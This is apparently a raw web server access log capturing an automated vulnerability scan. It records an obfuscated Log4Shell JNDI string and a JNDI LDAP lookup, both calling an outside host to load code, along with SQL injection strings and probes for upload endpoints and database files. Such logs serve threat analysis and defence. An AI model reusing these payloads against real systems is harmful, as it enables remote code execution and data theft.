120.48.166.19 - - [24/Nov/2025:00:50:01 +0800] "POST /servlet/~ic/nc.document.pub.fileSystem.servlet.DeleteServlet HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "POST /WEB_SERVICE/WebJLWebService.asmx/GetCustInfo HTTP/1.1" 302 138 "http://127.0.0.1/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "${:-y$}{${1n5:-j}nd${env:aws:-}i:r${cxy::-m}i://120.48.76.100:8182/i/hcSvqI7U/e5e75a/2vvf/3y8b/PQ5P8iBh/?Type=A Type&Name=1100110&Char=!}" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "GET /wp-includes/js/jquery/jquery.min.js.map?ver=3.7.1 HTTP/1.1" 404 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 200 1217 "https://106.12.86.167/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "POST /api/package/upload HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.165.251 - - [24/Nov/2025:00:50:01 +0800] "GET /data/pbootcms.db HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:01 +0800] "POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.98.114 - - [24/Nov/2025:00:50:01 +0800] "GET / HTTP/1.1" 302 5 "new+javax.naming.InitialContext%28%29.lookup%28%22ldap://120.48.76.100:8181/i/LDAP-START/254d51/ezez/4oen/LDAP-END%22%29" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:01 +0800] "GET /login/forgetpswd.php?userName=113'+UNION+ALL+SELECT+CONCAT(0x716b627071,0x626e65637762736b,0x7176627871)--+-&org_id=113 HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
120.48.166.19 - - [24/Nov/2025:00:50:01 +0800] "POST /CDGServer3/AutoSignService1?command=GETSYSTEMINFO HTTP/1.1" 302 138 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
